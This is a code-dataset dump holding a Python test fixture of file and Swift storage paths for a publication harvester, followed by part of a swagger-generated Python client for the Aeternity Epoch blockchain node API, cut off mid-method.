| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4f8c28c8d646398cc7d6e08dac9373735e232bb9
| 1,898
|
py
|
Python
|
tests/unit_tests/fixtures/swift_object.py
|
Barometre-de-la-Science-Ouverte/bso3-harvest-publication
|
06c729a1e44ed87e8f73b4c2bd456f5e09a73e34
|
[
"MIT"
] | null | null | null |
tests/unit_tests/fixtures/swift_object.py
|
Barometre-de-la-Science-Ouverte/bso3-harvest-publication
|
06c729a1e44ed87e8f73b4c2bd456f5e09a73e34
|
[
"MIT"
] | null | null | null |
tests/unit_tests/fixtures/swift_object.py
|
Barometre-de-la-Science-Ouverte/bso3-harvest-publication
|
06c729a1e44ed87e8f73b4c2bd456f5e09a73e34
|
[
"MIT"
] | null | null | null |
import json
import os
from infrastructure.storage.swift import Swift
from config.harvester_config import config_harvester
from domain.ovh_path import OvhPath
# Swift storage client wired to the harvester configuration.
# NOTE(review): constructed at import time — if Swift.__init__ opens a
# connection, importing this fixture module has side effects; confirm.
_swift = Swift(config_harvester)

# Local paths of the harvested artifacts for two publications
# (metadata .json, .software.json, .tei.xml and .pdf per UUID).
local_dir = [
    './tmp/downloaded_publications/9fea8e3a-344c-4552-874c-6852074bcdd1.json',
    './tmp/downloaded_publications/9fea8e3a-344c-4552-874c-6852074bcdd1.software.json',
    './tmp/downloaded_publications/9fea8e3a-344c-4552-874c-6852074bcdd1.tei.xml',
    './tmp/downloaded_publications/9fea8e3a-344c-4552-874c-6852074bcdd1.pdf',
    './tmp/downloaded_publications/dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38.software.json',
    './tmp/downloaded_publications/dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38.tei.xml',
    './tmp/downloaded_publications/dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38.json',
    './tmp/downloaded_publications/dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38.pdf'
]

# (local path, remote OvhPath) pairs for GROBID TEI results; the remote
# prefix shards by the first four hex byte pairs of the UUID.
grobid_files_to_upload = [
    (
        './tmp/downloaded_publications/9fea8e3a-344c-4552-874c-6852074bcdd1.tei.xml',
        OvhPath('grobid', '9f', 'ea', '8e', '3a', '9fea8e3a-344c-4552-874c-6852074bcdd1', '9fea8e3a-344c-4552-874c-6852074bcdd1.tei.xml')
    ),
    (
        './tmp/downloaded_publications/dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38.tei.xml',
        OvhPath('grobid', 'dc', 'd4', '1f', '3e', 'dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38', 'dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38.tei.xml')
    ),
]

# Same pairing for softcite extraction results.
softcite_files_to_upload = [
    (
        './tmp/downloaded_publications/9fea8e3a-344c-4552-874c-6852074bcdd1.software.json',
        OvhPath('softcite','9f', 'ea', '8e', '3a', '9fea8e3a-344c-4552-874c-6852074bcdd1', '9fea8e3a-344c-4552-874c-6852074bcdd1.software.json')
    ),
    (
        './tmp/downloaded_publications/dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38.software.json',
        OvhPath('softcite', 'dc', 'd4', '1f', '3e', 'dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38', 'dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38.software.json')
    ),
]
| 47.45
| 145
| 0.728135
| 225
| 1,898
| 6.035556
| 0.2
| 0.114875
| 0.220913
| 0.147275
| 0.820324
| 0.820324
| 0.820324
| 0.807069
| 0.741532
| 0.693667
| 0
| 0.214328
| 0.110116
| 1,898
| 40
| 146
| 47.45
| 0.589698
| 0
| 0
| 0.333333
| 0
| 0
| 0.679305
| 0.647709
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.138889
| 0
| 0.138889
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4fa66e13bda6f759767d7ec5ea225dc529e40f21
| 126,407
|
py
|
Python
|
py/tests/swagger_client/api/internal_api.py
|
AndyHongSir/epoch
|
3ac26ee08c12d5d923c88eb5db5479f3b9d9b294
|
[
"ISC"
] | null | null | null |
py/tests/swagger_client/api/internal_api.py
|
AndyHongSir/epoch
|
3ac26ee08c12d5d923c88eb5db5479f3b9d9b294
|
[
"ISC"
] | null | null | null |
py/tests/swagger_client/api/internal_api.py
|
AndyHongSir/epoch
|
3ac26ee08c12d5d923c88eb5db5479f3b9d9b294
|
[
"ISC"
] | null | null | null |
# coding: utf-8
"""
Aeternity Epoch
This is the [Aeternity](https://www.aeternity.com/) Epoch API. # noqa: E501
OpenAPI spec version: 0.7.0
Contact: apiteam@aeternity.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class InternalApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Create the API wrapper; builds a default ApiClient when none is given."""
    self.api_client = api_client if api_client is not None else ApiClient()
def get_account_balance(self, account_pubkey, **kwargs):  # noqa: E501
    """get_account_balance  # noqa: E501
    Get accounts's balance.  Synchronous by default; pass async=True
    (as a kwargs entry) to run the request asynchronously, in which case
    the request thread is returned.  # noqa: E501
    :param async bool
    :param str account_pubkey: Account pubkey to show balance for (required)
    :param int height: Height of the block to show balance at
    :param str hash: Hash of the block to show balance at
    :return: Balance
    """
    # Always unwrap to the deserialized data (not the full HTTP triple).
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async'):
        # Asynchronous: hand back the request thread straight away.
        return self.get_account_balance_with_http_info(account_pubkey, **kwargs)  # noqa: E501
    # Synchronous: the helper already returns the deserialized data.
    return self.get_account_balance_with_http_info(account_pubkey, **kwargs)  # noqa: E501
def get_account_balance_with_http_info(self, account_pubkey, **kwargs):  # noqa: E501
    """get_account_balance  # noqa: E501
    Get accounts's balance  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True
    >>> thread = api.get_account_balance_with_http_info(account_pubkey, async=True)
    >>> result = thread.get()
    :param async bool
    :param str account_pubkey: Account pubkey to show balance for (required)
    :param int height: Height of the block to show balance at
    :param str hash: Hash of the block to show balance at
    :return: Balance
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: on an unexpected keyword argument
    :raises ValueError: when account_pubkey is missing or None
    """
    # Keyword arguments accepted by this endpoint.
    all_params = ['account_pubkey', 'height', 'hash']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # locals() is captured before any other local is defined, so `params`
    # holds exactly self, account_pubkey and kwargs at this point.
    params = locals()
    # dict.items() works on both Python 2 and 3; no need for six here.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_account_balance" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'account_pubkey' is set
    if ('account_pubkey' not in params or
            params['account_pubkey'] is None):
        raise ValueError("Missing the required parameter `account_pubkey` when calling `get_account_balance`")  # noqa: E501

    collection_formats = {}

    # URL templating: {account_pubkey} is substituted from the parameter.
    path_params = {}
    if 'account_pubkey' in params:
        path_params['account_pubkey'] = params['account_pubkey']  # noqa: E501

    query_params = []
    if 'height' in params:
        query_params.append(('height', params['height']))  # noqa: E501
    if 'hash' in params:
        query_params.append(('hash', params['hash']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/account/balance/{account_pubkey}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Balance',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        # BUG FIX: `async` became a reserved keyword in Python 3.7, so
        # `async=...` is a SyntaxError; pass it via dict unpacking instead.
        **{'async': params.get('async')})
def get_account_transactions(self, account_pubkey, **kwargs):  # noqa: E501
    """get_account_transactions  # noqa: E501
    Get accounts's transactions included in blocks in the longest chain.
    Synchronous by default; pass async=True (as a kwargs entry) to run the
    request asynchronously, in which case the request thread is returned.  # noqa: E501
    :param async bool
    :param str account_pubkey: Account pubkey to show transactions for (required)
    :param int limit: Maximum transactions count to show
    :param int offset: Offset to start transaction list from
    :param str tx_types: Transactions types to show. Comma separated
    :param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
    :param str tx_encoding: Transactions encoding
    :return: TxObjects
    """
    # Always unwrap to the deserialized data (not the full HTTP triple).
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async'):
        # Asynchronous: hand back the request thread straight away.
        return self.get_account_transactions_with_http_info(account_pubkey, **kwargs)  # noqa: E501
    # Synchronous: the helper already returns the deserialized data.
    return self.get_account_transactions_with_http_info(account_pubkey, **kwargs)  # noqa: E501
def get_account_transactions_with_http_info(self, account_pubkey, **kwargs):  # noqa: E501
    """get_account_transactions  # noqa: E501

    Get accounts's transactions included in blocks in the longest chain  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_account_transactions_with_http_info(account_pubkey, async=True)
    >>> result = thread.get()

    :param async bool
    :param str account_pubkey: Account pubkey to show transactions for (required)
    :param int limit: Maximum transactions count to show
    :param int offset: Offset to start transaction list from
    :param str tx_types: Transactions types to show. Comma separated
    :param str exclude_tx_types: Transactions types not to show. Comma separated. If a tx type appears in both tx_types and exclude_tx_types, it is excluded.
    :param str tx_encoding: Transactions encoding
    :return: TxObjects
             If the method is called asynchronously,
             returns the request thread.
    """
    # Whitelist of accepted kwargs: the endpoint's own parameters plus the
    # control flags every generated method understands.
    all_params = ['account_pubkey', 'limit', 'offset', 'tx_types', 'exclude_tx_types', 'tx_encoding']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Generated-code idiom: seed `params` from locals() (self,
    # account_pubkey, kwargs), then merge each validated keyword in.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_account_transactions" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'account_pubkey' is set
    if ('account_pubkey' not in params or
            params['account_pubkey'] is None):
        raise ValueError("Missing the required parameter `account_pubkey` when calling `get_account_transactions`")  # noqa: E501

    # Range checks mirror the API spec: 1 <= limit <= 100, offset >= 0.
    if 'limit' in params and params['limit'] > 100:  # noqa: E501
        raise ValueError("Invalid value for parameter `limit` when calling `get_account_transactions`, must be a value less than or equal to `100`")  # noqa: E501
    if 'limit' in params and params['limit'] < 1:  # noqa: E501
        raise ValueError("Invalid value for parameter `limit` when calling `get_account_transactions`, must be a value greater than or equal to `1`")  # noqa: E501
    if 'offset' in params and params['offset'] < 0:  # noqa: E501
        raise ValueError("Invalid value for parameter `offset` when calling `get_account_transactions`, must be a value greater than or equal to `0`")  # noqa: E501

    # Marshal path and query parameters for the transport layer.
    collection_formats = {}

    path_params = {}
    if 'account_pubkey' in params:
        path_params['account_pubkey'] = params['account_pubkey']  # noqa: E501

    query_params = []
    if 'limit' in params:
        query_params.append(('limit', params['limit']))  # noqa: E501
    if 'offset' in params:
        query_params.append(('offset', params['offset']))  # noqa: E501
    if 'tx_types' in params:
        query_params.append(('tx_types', params['tx_types']))  # noqa: E501
    if 'exclude_tx_types' in params:
        query_params.append(('exclude_tx_types', params['exclude_tx_types']))  # noqa: E501
    if 'tx_encoding' in params:
        query_params.append(('tx_encoding', params['tx_encoding']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # NOTE(review): `async` became a reserved keyword in Python 3.7; the
    # `async=` keyword argument below only parses on older interpreters.
    return self.api_client.call_api(
        '/account/txs/{account_pubkey}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='TxObjects',  # noqa: E501
        auth_settings=auth_settings,
        async=params.get('async'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_active_registered_oracles(self, **kwargs):  # noqa: E501
    """get_active_registered_oracles  # noqa: E501

    Get active registered oracles.  Synchronous by default; pass
    async=True to run the request in the background and receive the
    request thread instead:

    >>> thread = api.get_active_registered_oracles(async=True)
    >>> result = thread.get()

    :param async bool
    :param str _from: Last oracle in previous page
    :param int max: Max number of active oracles received
    :return: RegisteredOracles, or the request thread when called asynchronously
    """
    # Delegate to the low-level variant, requesting the deserialized body
    # only; the async/sync distinction is handled entirely by that helper.
    kwargs['_return_http_data_only'] = True
    return self.get_active_registered_oracles_with_http_info(**kwargs)  # noqa: E501
def get_active_registered_oracles_with_http_info(self, **kwargs):  # noqa: E501
    """get_active_registered_oracles  # noqa: E501

    Get active registered oracles  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_active_registered_oracles_with_http_info(async=True)
    >>> result = thread.get()

    :param async bool
    :param str _from: Last oracle in previous page
    :param int max: Max number of active oracles received
    :return: RegisteredOracles
             If the method is called asynchronously,
             returns the request thread.
    """
    # Whitelist of accepted kwargs: the endpoint's own parameters plus the
    # control flags every generated method understands.
    all_params = ['_from', 'max']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Generated-code idiom: seed `params` from locals(), then merge each
    # validated keyword argument in.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_active_registered_oracles" % key
            )
        params[key] = val
    del params['kwargs']

    # Range check mirrors the API spec: 1 <= max <= 1000.
    if 'max' in params and params['max'] > 1000:  # noqa: E501
        raise ValueError("Invalid value for parameter `max` when calling `get_active_registered_oracles`, must be a value less than or equal to `1000`")  # noqa: E501
    if 'max' in params and params['max'] < 1:  # noqa: E501
        raise ValueError("Invalid value for parameter `max` when calling `get_active_registered_oracles`, must be a value greater than or equal to `1`")  # noqa: E501

    # Marshal query parameters; `_from` is underscored locally because
    # `from` is a Python keyword, but the wire name stays 'from'.
    collection_formats = {}

    path_params = {}

    query_params = []
    if '_from' in params:
        query_params.append(('from', params['_from']))  # noqa: E501
    if 'max' in params:
        query_params.append(('max', params['max']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # NOTE(review): `async` became a reserved keyword in Python 3.7; the
    # `async=` keyword argument below only parses on older interpreters.
    return self.api_client.call_api(
        '/oracles', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='RegisteredOracles',  # noqa: E501
        auth_settings=auth_settings,
        async=params.get('async'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_block_by_hash_internal(self, hash, **kwargs):  # noqa: E501
    """get_block_by_hash_internal  # noqa: E501

    Get a block by hash.  Synchronous by default; pass async=True to run
    the request in the background and receive the request thread instead:

    >>> thread = api.get_block_by_hash_internal(hash, async=True)
    >>> result = thread.get()

    :param async bool
    :param str hash: Hash of the block to fetch (required)
    :param str tx_encoding: Transactions encoding
    :return: GenericBlock, or the request thread when called asynchronously
    """
    # Delegate to the low-level variant, requesting the deserialized body
    # only; the async/sync distinction is handled entirely by that helper.
    kwargs['_return_http_data_only'] = True
    return self.get_block_by_hash_internal_with_http_info(hash, **kwargs)  # noqa: E501
def get_block_by_hash_internal_with_http_info(self, hash, **kwargs):  # noqa: E501
    """get_block_by_hash_internal  # noqa: E501

    Get a block by hash  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_block_by_hash_internal_with_http_info(hash, async=True)
    >>> result = thread.get()

    :param async bool
    :param str hash: Hash of the block to fetch (required)
    :param str tx_encoding: Transactions encoding
    :return: GenericBlock
             If the method is called asynchronously,
             returns the request thread.
    """
    # Whitelist of accepted kwargs: the endpoint's own parameters plus the
    # control flags every generated method understands.
    all_params = ['hash', 'tx_encoding']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Generated-code idiom: seed `params` from locals() (self, hash,
    # kwargs), then merge each validated keyword argument in.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_block_by_hash_internal" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'hash' is set
    if ('hash' not in params or
            params['hash'] is None):
        raise ValueError("Missing the required parameter `hash` when calling `get_block_by_hash_internal`")  # noqa: E501

    # Marshal path and query parameters for the transport layer.
    collection_formats = {}

    path_params = {}
    if 'hash' in params:
        path_params['hash'] = params['hash']  # noqa: E501

    query_params = []
    if 'tx_encoding' in params:
        query_params.append(('tx_encoding', params['tx_encoding']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # NOTE(review): `async` became a reserved keyword in Python 3.7; the
    # `async=` keyword argument below only parses on older interpreters.
    return self.api_client.call_api(
        '/block/hash/{hash}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='GenericBlock',  # noqa: E501
        auth_settings=auth_settings,
        async=params.get('async'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_block_by_height_internal(self, height, **kwargs):  # noqa: E501
    """get_block_by_height_internal  # noqa: E501

    Get a block by height.  Synchronous by default; pass async=True to run
    the request in the background and receive the request thread instead:

    >>> thread = api.get_block_by_height_internal(height, async=True)
    >>> result = thread.get()

    :param async bool
    :param int height: Height of the block to fetch (required)
    :param str tx_encoding: Transactions encoding
    :return: GenericBlock, or the request thread when called asynchronously
    """
    # Delegate to the low-level variant, requesting the deserialized body
    # only; the async/sync distinction is handled entirely by that helper.
    kwargs['_return_http_data_only'] = True
    return self.get_block_by_height_internal_with_http_info(height, **kwargs)  # noqa: E501
def get_block_by_height_internal_with_http_info(self, height, **kwargs):  # noqa: E501
    """get_block_by_height_internal  # noqa: E501

    Get a block by height  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_block_by_height_internal_with_http_info(height, async=True)
    >>> result = thread.get()

    :param async bool
    :param int height: Height of the block to fetch (required)
    :param str tx_encoding: Transactions encoding
    :return: GenericBlock
             If the method is called asynchronously,
             returns the request thread.
    """
    # Whitelist of accepted kwargs: the endpoint's own parameters plus the
    # control flags every generated method understands.
    all_params = ['height', 'tx_encoding']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Generated-code idiom: seed `params` from locals() (self, height,
    # kwargs), then merge each validated keyword argument in.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_block_by_height_internal" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'height' is set
    if ('height' not in params or
            params['height'] is None):
        raise ValueError("Missing the required parameter `height` when calling `get_block_by_height_internal`")  # noqa: E501

    # Marshal path and query parameters for the transport layer.
    collection_formats = {}

    path_params = {}
    if 'height' in params:
        path_params['height'] = params['height']  # noqa: E501

    query_params = []
    if 'tx_encoding' in params:
        query_params.append(('tx_encoding', params['tx_encoding']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # NOTE(review): `async` became a reserved keyword in Python 3.7; the
    # `async=` keyword argument below only parses on older interpreters.
    return self.api_client.call_api(
        '/block/height/{height}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='GenericBlock',  # noqa: E501
        auth_settings=auth_settings,
        async=params.get('async'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_block_genesis(self, **kwargs):  # noqa: E501
    """get_block_genesis  # noqa: E501

    Get the genesis block.  Synchronous by default; pass async=True to run
    the request in the background and receive the request thread instead:

    >>> thread = api.get_block_genesis(async=True)
    >>> result = thread.get()

    :param async bool
    :param str tx_encoding: Transactions encoding
    :return: GenericBlock, or the request thread when called asynchronously
    """
    # Delegate to the low-level variant, requesting the deserialized body
    # only; the async/sync distinction is handled entirely by that helper.
    kwargs['_return_http_data_only'] = True
    return self.get_block_genesis_with_http_info(**kwargs)  # noqa: E501
def get_block_genesis_with_http_info(self, **kwargs):  # noqa: E501
    """get_block_genesis  # noqa: E501

    Get the genesis block  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_block_genesis_with_http_info(async=True)
    >>> result = thread.get()

    :param async bool
    :param str tx_encoding: Transactions encoding
    :return: GenericBlock
             If the method is called asynchronously,
             returns the request thread.
    """
    # Whitelist of accepted kwargs: the endpoint's own parameters plus the
    # control flags every generated method understands.
    all_params = ['tx_encoding']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Generated-code idiom: seed `params` from locals(), then merge each
    # validated keyword argument in.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_block_genesis" % key
            )
        params[key] = val
    del params['kwargs']

    # Marshal query parameters for the transport layer; no path params.
    collection_formats = {}

    path_params = {}

    query_params = []
    if 'tx_encoding' in params:
        query_params.append(('tx_encoding', params['tx_encoding']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # NOTE(review): `async` became a reserved keyword in Python 3.7; the
    # `async=` keyword argument below only parses on older interpreters.
    return self.api_client.call_api(
        '/block/genesis', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='GenericBlock',  # noqa: E501
        auth_settings=auth_settings,
        async=params.get('async'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_block_latest(self, **kwargs):  # noqa: E501
    """get_block_latest  # noqa: E501

    Get the top block.  Synchronous by default; pass async=True to run
    the request in the background and receive the request thread instead:

    >>> thread = api.get_block_latest(async=True)
    >>> result = thread.get()

    :param async bool
    :param str tx_encoding: Transactions encoding
    :return: GenericBlock, or the request thread when called asynchronously
    """
    # Delegate to the low-level variant, requesting the deserialized body
    # only; the async/sync distinction is handled entirely by that helper.
    kwargs['_return_http_data_only'] = True
    return self.get_block_latest_with_http_info(**kwargs)  # noqa: E501
def get_block_latest_with_http_info(self, **kwargs):  # noqa: E501
    """get_block_latest  # noqa: E501

    Get the top block  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_block_latest_with_http_info(async=True)
    >>> result = thread.get()

    :param async bool
    :param str tx_encoding: Transactions encoding
    :return: GenericBlock
             If the method is called asynchronously,
             returns the request thread.
    """
    # Whitelist of accepted kwargs: the endpoint's own parameters plus the
    # control flags every generated method understands.
    all_params = ['tx_encoding']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Generated-code idiom: seed `params` from locals(), then merge each
    # validated keyword argument in.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_block_latest" % key
            )
        params[key] = val
    del params['kwargs']

    # Marshal query parameters for the transport layer; no path params.
    collection_formats = {}

    path_params = {}

    query_params = []
    if 'tx_encoding' in params:
        query_params.append(('tx_encoding', params['tx_encoding']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # NOTE(review): `async` became a reserved keyword in Python 3.7; the
    # `async=` keyword argument below only parses on older interpreters.
    return self.api_client.call_api(
        '/block/latest', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='GenericBlock',  # noqa: E501
        auth_settings=auth_settings,
        async=params.get('async'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_block_number(self, **kwargs):  # noqa: E501
    """get_block_number  # noqa: E501

    Get the current block's height.  Synchronous by default; pass
    async=True to run the request in the background and receive the
    request thread instead:

    >>> thread = api.get_block_number(async=True)
    >>> result = thread.get()

    :param async bool
    :return: BlockHeight, or the request thread when called asynchronously
    """
    # Delegate to the low-level variant, requesting the deserialized body
    # only; the async/sync distinction is handled entirely by that helper.
    kwargs['_return_http_data_only'] = True
    return self.get_block_number_with_http_info(**kwargs)  # noqa: E501
def get_block_number_with_http_info(self, **kwargs):  # noqa: E501
    """get_block_number  # noqa: E501

    Get the current block's height  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_block_number_with_http_info(async=True)
    >>> result = thread.get()

    :param async bool
    :return: BlockHeight
             If the method is called asynchronously,
             returns the request thread.
    """
    # This endpoint takes no parameters of its own; only the generated
    # client's control flags are accepted.
    all_params = []  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Generated-code idiom: seed `params` from locals(), then merge each
    # validated keyword argument in.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_block_number" % key
            )
        params[key] = val
    del params['kwargs']

    # No path, query, form or body parameters for this endpoint.
    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # NOTE(review): `async` became a reserved keyword in Python 3.7; the
    # `async=` keyword argument below only parses on older interpreters.
    return self.api_client.call_api(
        '/block/number', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='BlockHeight',  # noqa: E501
        auth_settings=auth_settings,
        async=params.get('async'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_block_pending(self, **kwargs):  # noqa: E501
    """get_block_pending  # noqa: E501

    Get the block being mined.  Synchronous by default; pass async=True
    to run the request in the background and receive the request thread
    instead:

    >>> thread = api.get_block_pending(async=True)
    >>> result = thread.get()

    :param async bool
    :param str tx_encoding: Transactions encoding
    :return: GenericBlock, or the request thread when called asynchronously
    """
    # Delegate to the low-level variant, requesting the deserialized body
    # only; the async/sync distinction is handled entirely by that helper.
    kwargs['_return_http_data_only'] = True
    return self.get_block_pending_with_http_info(**kwargs)  # noqa: E501
def get_block_pending_with_http_info(self, **kwargs):  # noqa: E501
    """get_block_pending  # noqa: E501

    Get the block being mined  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_block_pending_with_http_info(async=True)
    >>> result = thread.get()

    :param async bool
    :param str tx_encoding: Transactions encoding
    :return: GenericBlock
             If the method is called asynchronously,
             returns the request thread.
    """
    # Whitelist of accepted kwargs: the endpoint's own parameters plus the
